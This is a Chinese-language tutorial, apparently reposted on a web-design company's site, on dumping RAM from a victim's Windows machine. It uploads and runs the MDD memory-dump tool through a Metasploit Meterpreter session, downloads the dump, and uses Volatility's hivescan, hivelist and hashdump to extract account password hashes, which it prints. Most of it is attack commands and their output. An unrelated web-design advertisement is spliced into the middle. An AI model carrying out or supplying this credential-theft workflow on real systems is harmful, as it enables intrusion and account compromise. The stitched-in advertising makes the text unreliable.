解析内存中的数据安全隐患

ManTech MDD(http://www.mantech.com/msma/MDD.asp)是遵循GPL协议发布的，MDD可以复制以下微软操作系统内存的所有内容：WINDOWS 2000, Windows XP, Windows 2003 Server, Windows 2008 Server。

为始兴等地区用户提供了全套网页设计制作服务，及始兴网站建设行业解决方案。主营业务为做网站、网站制作、始兴网站设计，以传统方式定制建设网站，并提供域名空间备案等一条龙服务，秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求，就会得到认可，从而选择与我们长期合作。这样，我们也可以走得更远！

从ManTech网站下载MDD后，你必须使用命令行来运行MDD程序。

MDD命令行用法

mdd -o 输出文件名

例如：

C:toolsmdd> mdd -o memory.dd

-> mdd

-> ManTech Physical Memory Dump Utility

Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'

This is free software, and you are welcome to redistribute it

under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)

0 map operations failed

took 21 seconds to write

MD5 is: a48986bb0558498684414e9399ca19fc

输出文件通常都会涉及镜像，MDD的功能仅限于复制物理内存，所以必须利用其他工具来分析内存镜像。

这里我们使用Metasploit Meterpreter和MDD共同来完成下面的工作。

首先需要更新MDD。

meterpreter > upload /root/mdd.exe .

[*] uploading : /root/mdd.exe -> .

[*] uploaded : /root/mdd.exe -> .mdd.exe

meterpreter > ls

Listing: c:

============

Mode Size Type Last modified Name

---- ---- ---- ------------- ----

100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT

100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS

40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings

100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS

100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS

100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM

40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files

40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information

40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS

100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini

100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe

100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr

100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

在被攻击者的机器上执行MDD来获得RAM信息

meterpreter > execute -f "cmd.exe" -i -H

Process 1908 created.

Channel 2 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

c:> mdd.exe -o memory.dd

mdd.exe -o memory.dd

-> mdd

-> ManTech Physical Memory Dump Utility

Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'

This is free software, and you are welcome to redistribute it

under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)

0 map operations failed

took 23 seconds to write

MD5 is: be9d1d906fac99fa01782e847a1c3144

这里，我们只需要毫不费力的运行工具，所需的数据将会被捕获下来。

meterpreter > execute -f mdd.exe -a "-o demo.dd"

Process 3436 created.

我们需要证实内存镜像已被捕获。

meterpreter > ls

Listing: C:

============

Mode Size Type Last modified Name

---- ---- ---- ------------- ----

100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip

100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT

100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2

100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip

100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub

100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS

100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2

40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS

100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt

100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini

100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd

100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe

100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr

100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers#p#

40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share

100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download memory dump using Meterpreter.

meterpreter > download memory.dd .

[*] downloading: memory.dd -> .

[*] downloaded : memory.dd -> ./demo.dd

meterpreter >

我们已得到了.dd的本地映像，现在就可以利用http://forensiczone.blogspot.com/2009/01/using-volatility-1.html提供的操作步骤来获取内存中的敏感信息。

附：

Volatility(https://www.volatilesystems.com/default/volatility)

$python volatility

Volatile Systems Volatility Framework v1.3

Copyright (C) 2007,2008 Volatile Systems

Copyright (C) 2007 Komoku, Inc.

This is free software; see the source for copying conditions.

There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts

For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:

connections Print list of open connections

connscan Scan for connection objects

connscan2 Scan for connection objects (New)

datetime Get date/time information for image

dlllist Print list of loaded dlls for each process

dmp2raw Convert a crash dump to a raw dump

dmpchk Dump crash dump information

files Print list of open files for each process

hibinfo Convert hibernation file to linear raw image

ident Identify image properties

memdmp Dump the addressable memory for a process

memmap Print the memory map

modscan Scan for modules

modscan2 Scan for module objects (New)

modules Print list of loaded modules

procdump Dump a process to an executable sample

pslist Print list of running processes

psscan Scan for EPROCESS objects

psscan2 Scan for process objects (New)

raw2dmp Convert a raw dump to a crash dump

regobjkeys Print list of open regkeys for each process

sockets Print list of open sockets

sockscan Scan for socket objects

sockscan2 Scan for socket objects (New)

strings Match physical offsets to virtual addresses (may take a while, VERY verbose)

thrdscan Scan for ETHREAD objects

thrdscan2 Scan for thread objects (New)

vaddump Dump the Vad sections to files

vadinfo Dump the VAD info

vadwalk Walk the vad tree

Supported Plugin Commands:

cachedump Dump (decrypted) domain hashes from the registry

hashdump Dump (decrypted) LM and NT hashes from the registry

hivelist Print list of registry hives

hivescan Scan for _CMHIVE objects (registry hives)

lsadump Dump (decrypted) LSA secrets from the registry

memmap_ex_2 Print the memory map

printkey Print a registry key, and its subkeys and values

pslist_ex_1 Print list running processes

pslist_ex_3 Print list running processes

usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. 运行hivescan得到所需偏移量

$ python volatility hivescan -f demo.dd

Offset (hex)

42168328 0x2837008

42195808 0x283db60

47598392 0x2d64b38

155764592 0x948c770

155973608 0x94bf7e8

208587616 0xc6ecb60

208964448 0xc748b60

234838880 0xdff5b60

243852936 0xe88e688

251418760 0xefc5888

252887048 0xf12c008

256039736 0xf42db38

269699936 0x10134b60

339523208 0x143cb688

346659680 0x14a99b60

377572192 0x16814b60

387192184 0x17141578

509150856 0x1e590688

521194336 0x1f10cb60

523667592 0x1f368888

527756088 0x1f74eb38

2. 运行hivelist

$ python volatility hivelist -f demo.dd -o 0x2837008

Address Name

0xe2610b60 Documents and SettingsSarahLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat

0xe25f0578 Documents and SettingsSarahNTUSER.DAT

0xe1d33008 Documents and SettingsLocalServiceLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat

0xe1c73888 Documents and SettingsLocalServiceNTUSER.DAT

0xe1c04688 Documents and SettingsNetworkServiceLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat

0xe1b70b60 Documents and SettingsNetworkServiceNTUSER.DAT

0xe1658b60 WINDOWSsystem32configsoftware

0xe1a5a7e8 WINDOWSsystem32configdefault

0xe165cb60 WINDOWSsystem32configSAM

0xe1a4f770 WINDOWSsystem32configSECURITY

0xe1559b38 [no name]

0xe1035b60 WINDOWSsystem32configsystem

0xe102e008 [no name]

3. Password Hash (-y System Hive Offset)(-s SAM Hive

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60

Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::

phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::

ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::

Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

名称栏目：解析内存中的数据安全隐患
标题来源：http://www.mswzjz.cn/qtweb/news22/306572.html

攀枝花网站建设、攀枝花网站运维推广公司-贝锐智能，是专注品牌与效果的网络营销公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 贝锐智能